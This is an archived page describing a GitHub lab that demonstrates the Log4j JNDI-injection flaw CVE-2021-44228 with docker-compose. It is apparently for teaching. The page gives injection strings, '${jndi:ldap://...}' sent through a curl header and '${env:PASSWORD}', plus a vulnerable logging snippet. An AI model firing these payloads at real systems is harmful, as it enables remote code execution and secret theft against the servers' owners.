POC详情: a5badb99e4837ede43bb8aeab5289a2fdb41db4c

来源
https://github.com/alpacamybags118/log4j-cve-2021-44228-sample
关联漏洞
标题: Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
描述
Sample docker-compose setup to show how this exploit works
介绍
# Example of log4j exploit

This repo has a working sample of abusing the recent [log4j exploit](https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance). It does not perform actual remote code execution, but shows you the ease at which a bad actor can have a vulnerable application call out to its own ldap server.

This uses the excellent log4j sample vulnerable app created christophetd: https://github.com/christophetd/log4shell-vulnerable-app

## Explanation

This vulnerability abuses the `lookup` functionality of log4j, specially the `jndi` which allows log4j to perform lookups from external hosts for data to input. This can be exploited to do anything from logging sensitive variables in the environment to executing code remotely.

Lookups are done for any text wrapped in `${}` when the logger is called. For example,

```
${jndi:ldap://someldapserver:1389/o=example}
```
would do a lookup on that LDAP server with the given query and output the result.

A more simple example that doesnt make use of jndi, but is still dangerous:

```
${env:PASSWORD}
```

This would print the contents of that environment variable into logs. Someone then with access to view those logs could extract sensitive data from the application.

## log4j Code

The code in log4j for this exploit to be abused is pretty straightforward. You just need to call the logger to log a given request property unsanitized. For example, you could log the contents of a `User-Agent`.

```
...
@GetMapping("/bad")
	public void Bad(@RequestHeader("User-Agent") String userAgent) {
    logger.info("Received User-Agent header " + userAgent);
	}
```

## Using this example

First, build the local ldap server:

```
docker build -t ldapnode .
```

Once built, bring up the whole stack by running

```
docker-compose up
```

Then, you can perform a request to the app, using the `x-api-version` header to inject the lookup

```
curl --request GET \
  --url http://localhost:8080/ \
  --header 'x-api-version: ${jndi:ldap://bad:1389/o=example}'
```

Using that request, you will see in the docker-compose logs, the ldap server will have been called:

```
bad_1    | ldap server has been called!
log4j_1  | 2021-12-14 02:43:11.657  INFO 1 --- [nio-8080-exec-2] HelloWorld                               : Received a request for API version com.sun.jndi.ldap.LdapCtx@201a609c
```

## What to do if you are impacted

Please see [this documentation](https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance) for resolution paths
文件快照

 [4.0K]  /data/pocs/a5badb99e4837ede43bb8aeab5289a2fdb41db4c
├── [ 227]  docker-compose.yml
├── [  82]  Dockerfile
├── [ 272]  index.js
├── [ 294]  package.json
├── [8.9K]  package-lock.json
└── [2.5K]  README.md

0 directories, 6 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。